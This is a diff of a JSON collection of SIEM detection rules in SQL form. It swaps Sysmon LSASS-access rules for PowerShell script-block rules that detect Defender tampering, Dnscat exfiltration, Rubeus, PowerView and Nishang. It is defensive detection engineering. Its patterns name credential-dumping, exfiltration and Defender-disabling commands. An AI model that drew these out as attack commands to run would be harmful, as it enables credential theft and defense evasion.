"id": "14c71865-6cd3-44ae-adaa-1db923fae5f2", + "status": "experimental", + "description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows defender atp or set default actions to allow.", + "author": "frack113, elhoim, Tim Shelton (fps, alias support)", "tags": [ - "attack.execution", - "attack.t1106", "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace REGEXP '^C:\\\\Windows\\\\SYSTEM32\\\\ntdll\\.dll\\+[a-z0-9]{4,6}\\|C:\\\\Windows\\\\System32\\\\KERNELBASE\\.dll\\+[a-z0-9]{4,6}\\|UNKNOWN\\([A-Z0-9]{16}\\)$' AND GrantedAccess IN ('0x1028', '0x1fffff'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND ScriptBlockText LIKE '%Allow%' ESCAPE '\\' AND (ScriptBlockText LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (ScriptBlockText LIKE '%ltdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%mtdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%htdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%stdefac %' ESCAPE '\\'))))" ], - "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml" + "filename": "posh_ps_tamper_defender.yml" }, { - "title": "LSASS Memory Dump", - "id": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", - "status": "experimental", - "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", - "author": "Samir Bousseaden, Michael Haag", - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "title": "Dnscat Execution", + "id": "a6d67db4-6220-436d-8afc-f3842fe05d43", + "status": "test", + "description": "Dnscat exfiltration tool execution", + "author": "Daniil Yugoslavskiy, oscd.community", + "tags": [ + "attack.exfiltration", + "attack.t1048", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "False positives are present when looking for 0x1410. Exclusions may be required." + "Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%0x1038%' ESCAPE '\\' OR GrantedAccess LIKE '%0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '%0x143a%' ESCAPE '\\') AND (CallTrace LIKE '%dbghelp.dll%' ESCAPE '\\' OR CallTrace LIKE '%dbgcore.dll%' ESCAPE '\\' OR CallTrace LIKE '%ntdll.dll%' ESCAPE '\\')) AND NOT ((CallTrace LIKE '%|C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND CallTrace LIKE '%\\\\thor\\\\thor64.exe+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND GrantedAccess = '0x103800') OR (SourceImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Dnscat2%' ESCAPE '\\')" ], - "filename": "proc_access_win_lsass_memdump.yml" + "filename": "posh_ps_dnscat_execution.yml" }, { - "title": "Load Undocumented Autoelevated COM Interface", - "id": "fb3722e4-1a06-46b6-b772-253e2e7db933", - "status": "test", - "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.", - "author": "oscd.community, Dmitry Uchakin", + "title": "HackTool - Rubeus Execution - ScriptBlock", + "id": "3245cd30-e015-40ff-a31d-5cadd5f377ec", + "status": "experimental", + "description": "Detects the execution of the hacktool Rubeus using specific command line flags", + "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1003", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace LIKE '%editionupgrademanagerobj.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%asreproast %' ESCAPE '\\' OR ScriptBlockText LIKE '%dump /service:krbtgt %' ESCAPE '\\' OR ScriptBlockText LIKE '%dump /luid:0x%' ESCAPE '\\' OR ScriptBlockText LIKE '%kerberoast %' ESCAPE '\\' OR ScriptBlockText LIKE '%createnetonly /program:%' ESCAPE '\\' OR ScriptBlockText LIKE '%ptt /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%/impersonateuser:%' ESCAPE '\\' OR ScriptBlockText LIKE '%renew /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%asktgt /user:%' ESCAPE '\\' OR ScriptBlockText LIKE '%harvest /interval:%' ESCAPE '\\' OR ScriptBlockText LIKE '%s4u /user:%' ESCAPE '\\' OR ScriptBlockText LIKE '%s4u /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%hash /password:%' ESCAPE '\\' OR ScriptBlockText LIKE '%golden /aes256:%' ESCAPE '\\' OR ScriptBlockText LIKE '%silver /user:%' ESCAPE '\\'))" ], - "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml" + "filename": "posh_ps_hktl_rubeus.yml" }, { - "title": "HandleKatz Duplicating LSASS Handle", - "id": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", - "status": "experimental", - "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", - "author": "Bhabesh Raj (rule), @thefLinkk", + "title": "Malicious PowerView PowerShell Commandlets", + "id": "dcd74b95-3f36-4ed9-9598-0490951643aa", + "status": "test", + "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", + "author": "Bhabesh Raj", "tags": [ "attack.execution", - "attack.t1106", - "attack.defense_evasion", - "attack.t1003.001" + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Should not be any as administrators do not use this tool" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1440' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-ADName%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-NameToSid%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-SID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainLocalGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DFSshare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Forest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetForest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PathAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Proxy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIReg%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EnumerateLocalAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EventHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FileFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ProcessHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Request-SPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resolve-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainUserPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Test-AdminAccess%' ESCAPE '\\'))" ], - "filename": "proc_access_win_handlekatz_lsass_access.yml" + "filename": "posh_ps_powerview_malicious_commandlets.yml" }, { - "title": "Potential Credential Dumping Attempt Via PowerShell", - "id": "0f920ebe-7aea-4c54-b202-9aa0c609cfe5", + "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS", + "id": "22d80745-6f2c-46da-826b-77adaededd74", "status": "experimental", - "description": "Detects PowerShell processes requesting access to \"lsass.exe\"", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Unknown" + "Rare intended use of hidden services", + "Rare FP could occur due to the non linearity of the ScriptBlockText log" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (SourceImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%D;;%' ESCAPE '\\' AND (ScriptBlockText LIKE '%;;;IU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;BA%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SY%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;WD%' ESCAPE '\\'))" ], - "filename": "proc_access_win_winapi_in_powershell_credentials_dumping.yml" + "filename": "posh_ps_susp_service_dacl_modification_set_service.yml" }, { - "title": "Credential Dumping by Pypykatz", - "id": "7186e989-4ed7-4f4e-a656-4674b9e3e48b", - "status": "test", - "description": "Detects LSASS process access by pypykatz for credential dumping.", - "author": "Bhabesh Raj", + "title": "Potential Persistence Via Security Descriptors - ScriptBlock", + "id": "2f77047c-e6e9-4c11-b088-a3de399524cd", + "status": "experimental", + "description": "Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%libffi-7.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python3%.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_Trustee%' ESCAPE '\\' AND ScriptBlockText LIKE '%win32\\_Ace%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AccessMask%' ESCAPE '\\' AND ScriptBlockText LIKE '%.AceType%' ESCAPE '\\' AND ScriptBlockText LIKE '%.SetSecurityDescriptor%' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Lsa\\\\JD%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Skew1%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\Data%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Lsa\\\\GBG%' ESCAPE '\\'))" ], - "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml" + "filename": "posh_ps_susp_ace_tampering.yml" }, { - "title": "SVCHOST Credential Dump", - "id": "174afcfa-6e40-4ae9-af64-496546389294", - "status": "test", - "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials", - "author": "Florent Labouyrie", + "title": "Malicious Nishang PowerShell Commandlets", + "id": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", + "status": "experimental", + "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", + "author": "Alec Costello", "tags": [ - "attack.t1548" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Non identified legit exectubale" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x143a') AND NOT ((SourceImage LIKE '%\\\\services.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-ConstrainedDelegationBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Copy-VSS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Create-MultipleSessions%' ESCAPE '\\' OR ScriptBlockText LIKE '%DataToEncode%' ESCAPE '\\' OR ScriptBlockText LIKE '%DNS\\_TXT\\_Pwnage%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration-Dns%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download\\_Execute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Download-Execute-PS%' ESCAPE '\\' OR ScriptBlockText LIKE '%DownloadAndExtractFromRemoteRegistry%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' OR ScriptBlockText LIKE '%DumpHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-Duplication%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-Command-MSSQL%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-DNSTXT-Code%' ESCAPE '\\' OR ScriptBlockText LIKE '%Execute-OnTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExetoText%' ESCAPE '\\' OR ScriptBlockText LIKE '%exfill%' ESCAPE '\\' OR ScriptBlockText LIKE '%ExfilOption%' ESCAPE '\\' OR ScriptBlockText LIKE '%FakeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireBuster%' ESCAPE '\\' OR ScriptBlockText LIKE '%FireListener%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Information %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHints%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Web-Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WebCredentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WLAN-Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AmsiBypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BruteForce%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialsPhish%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Decode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Encode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Interceptor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRegsvr%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-JSRatRundll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MimikatzWDigestDowngrade%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetworkRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellIcmp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellUdp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Prasadhak%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSGcat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsGcatAgent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SessionGopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSIDExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoggedKeys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Nishang%' ESCAPE '\\' OR ScriptBlockText LIKE '%NotAllNameSpaces%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-CHM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OUT-DNSTXT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-HTA%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-RundllCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCF%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-SCT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Shortcut%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-WebQuery%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Word%' ESCAPE '\\' OR ScriptBlockText LIKE '%Parse\\_Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Password-List%' ESCAPE '\\' OR ScriptBlockText LIKE '%Powerpreter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-PoshRat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Run-EXEonRemote%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DCShadowPermissions%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemotePSRemoting%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemoteWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode32%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode64%' ESCAPE '\\' OR ScriptBlockText LIKE '%StringtoBase64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TexttoExe%' ESCAPE '\\'))" ], - "filename": "proc_access_win_svchost_cred_dump.yml" + "filename": "posh_ps_nishang_malicious_commandlets.yml" }, { - "title": "LSASS Memory Access by Tool Named Dump", - "id": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", + "title": "PowerShell PSAttack", + "id": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", "status": "test", - "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of PSAttack PowerShell hack tool", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare programs that contain the word dump in their name and access lsass" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%dump%' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE 